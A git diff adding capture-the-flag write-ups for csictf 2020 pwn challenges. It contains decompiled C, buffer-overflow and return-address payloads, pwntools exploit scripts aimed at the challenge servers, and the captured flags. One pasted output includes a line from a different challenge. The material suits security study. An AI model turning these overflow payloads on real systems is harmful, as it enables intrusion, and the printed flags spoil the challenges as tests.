diff --git a/Pwn/Global Warming/README.md b/Pwn/Global Warming/README.md new file mode 100644 index 0000000..ed66f07 --- /dev/null +++ b/Pwn/Global Warming/README.md @@ -0,0 +1,10 @@ +## Global Warming +The main idea finding the flag is `%n` exploit. + +#### Step-1: + +https://github.com/crypt0n1te/Write-Ups/blob/master/csictf-2020/pwn/global-warming.md + +#### Step-5: +Finally the flag becomes: +`csictf{n0_5tr1ng5_@tt@ch3d}` \ No newline at end of file diff --git a/Pwn/Secret Society/README.md b/Pwn/Secret Society/README.md new file mode 100644 index 0000000..c997748 --- /dev/null +++ b/Pwn/Secret Society/README.md @@ -0,0 +1,84 @@ +## Secret Society +The main idea finding the flag is Buffer Overflow. + +#### Step-1: +After I downloaded `secret-society`, I reversed it with IDA, I got this source code: + +**main()** function: +```c +undefined8 main(void) +{ + size_t sVar1; + undefined8 local_d8 [2]; + undefined4 uStack200; + undefined auStack196 [108]; + char local_58 [56]; + FILE *local_20; + char *local_18; + __gid_t local_c; + + setvbuf(stdout,(char *)0x0,2,0); + local_c = getegid(); + setresgid(local_c,local_c,local_c); + memset(local_58,0,0x32); + memset(local_d8,0,0x80); + puts("What is the secret phrase?"); + fgets((char *)local_d8,0x80,stdin); + local_18 = strchr((char *)local_d8,10); + if (local_18 != (char *)0x0) { + *local_18 = '\0'; + } + sVar1 = strlen((char *)local_d8); + *(undefined8 *)((long)local_d8 + sVar1) = 0x657261206577202c; + *(undefined8 *)((long)local_d8 + sVar1 + 8) = 0x6877797265766520; + *(undefined4 *)((long)&uStack200 + sVar1) = 0x2e657265; + auStack196[sVar1] = 0; + local_20 = fopen("flag.txt","r"); + if (local_20 == (FILE *)0x0) { + printf("You are a double agent, it\'s game over for you."); + /* WARNING: Subroutine does not return */ + exit(0); + } + fgets(local_58,0x32,local_20); + printf("Shhh... don\'t tell anyone else about "); + puts((char *)local_d8); + return 0; +} + +``` + +#### Step-2: +So, basically I had to overflow 3 buffers in above code `local_d8 (16 bytes, our input buffer)`, `uStack200 (4 bytes)` & `auStack196 (108 bytes)` + +So I tried using Debugger to get the address of the flag. + + +```bash +echo flag > flag.txt +perl -e 'print "A"x16 . "B"x4 . "C"x108' | ./secret-society +``` + +I got this output: + +```bash +What is the secret phrase? +Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,flag +``` + +#### Step-3: +So, we just have to run this remotely on the web server. + +```bash +perl -e 'print "A"x16 . "B"x4 . "C"x108' | nc chall.csivit.com 30041 +``` +I got this output: + +```bash +What is the secret phrase? +Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,csivit{Bu!!er_e3pl01ts_ar5_5asy} +``` +Voila! I got the flag there. + +#### Step-4: +Finally the flag becomes: +`csivit{Bu!!er_e3pl01ts_ar5_5asy}` diff --git a/Pwn/Secret Society/flag.txt b/Pwn/Secret Society/flag.txt new file mode 100644 index 0000000..acf36e4 --- /dev/null +++ b/Pwn/Secret Society/flag.txt @@ -0,0 +1 @@ +flag diff --git a/Pwn/Secret Society/secret-society b/Pwn/Secret Society/secret-society new file mode 100644 index 0000000..0a7a257 Binary files /dev/null and b/Pwn/Secret Society/secret-society differ diff --git a/Pwn/pwn intended 0x1/README.md b/Pwn/pwn intended 0x1/README.md new file mode 100644 index 0000000..75979a2 --- /dev/null +++ b/Pwn/pwn intended 0x1/README.md @@ -0,0 +1,53 @@ +## pwn intended 0x1 +The main idea finding the flag is Buffer Overflow. + +#### Step-1: +I reversed the file with Ghidra. + +```c +undefined8 main(void) + +{ + char local_38 [44]; + int local_c; + + local_c = 0; + setbuf(stdout,(char *)0x0); + setbuf(stdin,(char *)0x0); + setbuf(stderr,(char *)0x0); + puts("Please pour me some coffee:"); + gets(local_38); + puts("\nThanks!\n"); + if (local_c != 0) { + puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it."); + system("cat flag.txt"); + } + return 0; +} +``` + +#### Step-2: +Clearly, this was a case for Buffer Overflow. + +A simple command to overflow the buffer would give us the flag. + +`python -c 'print"A"*45' | nc chall.csivit.com 30001` + + The piping done other way round doesn't help though. + +Output: + +```bash +Please pour me some coffee: + +Thanks! + +Oh no, you spilled some coffee on the floor! Use the flag to clean it. +csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r} +``` + +Voila! There we have our flag. + +#### Step-3: +Finally the flag becomes: +`csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}` \ No newline at end of file diff --git a/Pwn/pwn intended 0x1/pwn-intended-0x1 b/Pwn/pwn intended 0x1/pwn-intended-0x1 new file mode 100644 index 0000000..37b4fc9 Binary files /dev/null and b/Pwn/pwn intended 0x1/pwn-intended-0x1 differ diff --git a/Pwn/pwn intended 0x2/README.md b/Pwn/pwn intended 0x2/README.md new file mode 100644 index 0000000..f40416c --- /dev/null +++ b/Pwn/pwn intended 0x2/README.md @@ -0,0 +1,63 @@ +## pwn-intended-0x2 +The main idea finding the flag is overwrite the correct hex after padding. + +#### Step-1: +After I downloaded `pwn-intended-0x2`, I reversed it with IDA, I got this source code: + +```c +undefined8 main(void) + +{ + char local_38 [44]; + int local_c; + + local_c = 0; + setbuf(stdout,(char *)0x0); + setbuf(stdin,(char *)0x0); + setbuf(stderr,(char *)0x0); + puts("Welcome to csictf! Where are you headed?"); + gets(local_38); + puts("Safe Journey!"); + if (local_c == -0x35014542) { + puts("You\'ve reached your destination, here\'s a flag!"); + system("/bin/cat flag.txt"); + } + return 0; +} +``` + +#### Step-2: +`local_c` is checked for a hex value of `0xcafebabe`. Since the size of local array is 44, we have to write `0xcafebabe` after 44 bytes. + +#### Step-3: +I wrote a very common `rev_exploit.py` to pwn into the machine. + +```python +import pwn + +r = pwn.remote('chall.csivit.com', 30007) + +payload = "A"*44 + '\xbe\xba\xfe\xca' + +r.sendline(payload) +r.interactive() +``` + +#### Step-4: +When I finally ran this `python3 rev_exploit.py`, I got this output: + +```bash +[+] Opening connection to chall.csivit.com on port 30007: Done +[*] Switching to interactive mode +Welcome to csictf! Where are you headed? +Safe Journey! +You've reached your destination, here's a flag! +csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive +$ +[*] Interrupted +``` +Voila! I got the flag there. + +#### Step-5: +Finally the flag becomes: +`csictf{c4n_y0u_re4lly_telep0rt?}` \ No newline at end of file diff --git a/Pwn/pwn intended 0x2/pwn-intended-0x2 b/Pwn/pwn intended 0x2/pwn-intended-0x2 new file mode 100644 index 0000000..aaa5e4f Binary files /dev/null and b/Pwn/pwn intended 0x2/pwn-intended-0x2 differ diff --git a/Pwn/pwn intended 0x2/rev_exploit.py b/Pwn/pwn intended 0x2/rev_exploit.py new file mode 100644 index 0000000..12c4835 --- /dev/null +++ b/Pwn/pwn intended 0x2/rev_exploit.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python3 + +import pwn + +r = pwn.remote('chall.csivit.com', 30007) + +payload = "A"*44 + '\xbe\xba\xfe\xca' + +r.sendline(payload) +r.interactive() diff --git a/Pwn/pwn-intended-0x3/README.md b/Pwn/pwn-intended-0x3/README.md new file mode 100644 index 0000000..f3bb504 --- /dev/null +++ b/Pwn/pwn-intended-0x3/README.md @@ -0,0 +1,76 @@ +## pwn-intended-0x3 +The main idea finding the flag is overwrite the correct hex after padding. + +#### Step-1: +After I downloaded `pwn-intended-0x3`, I reversed it with IDA, I got this source code: + +**main()** function: +```c +undefined8 main(void) + +{ + char local_28 [32]; + + setbuf(stdout,(char *)0x0); + setbuf(stdin,(char *)0x0); + setbuf(stderr,(char *)0x0); + puts("Welcome to csictf! Time to teleport again."); + gets(local_28); + return 0; +} +``` + +**flag()** function: +```c +void flag(void) + +{ + puts("Well, that was quick. Here\'s your flag:"); + system("cat flag.txt"); + /* WARNING: Subroutine does not return */ + exit(0); +} +``` + +#### Step-2: +I just had to write the address of the flag function after 32+8 bytes. + +So I tried using Debugger to get the address of the flag. + +```bash +echo into functions | gdb ./pwn-intended-0x3 | grep flag +``` +I got this output: `0x00000000004011ce flag` + +#### Step-3: +I wrote a very common `rev_exploit.py` to pwn into the machine. + +```python +import pwn + +r = pwn.remote('chall.csivit.com', 30013) + +payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00' + +r.sendline(payload) +r.interactive() +``` + +#### Step-4: +When I finally ran this `python3 rev_exploit.py`, I got this output: + +```bash +[+] Opening connection to chall.csivit.com on port 30013: Done +[*] Switching to interactive mode +Welcome to csictf! Time to teleport again. +Well, that was quick. Here's your flag: +You've reached your destination, here's a flag! +csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive +$ +[*] Interrupted +``` +Voila! I got the flag there. + +#### Step-5: +Finally the flag becomes: +`csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}` \ No newline at end of file diff --git a/Pwn/pwn-intended-0x3/pwn-intended-0x3 b/Pwn/pwn-intended-0x3/pwn-intended-0x3 new file mode 100644 index 0000000..f075f4e Binary files /dev/null and b/Pwn/pwn-intended-0x3/pwn-intended-0x3 differ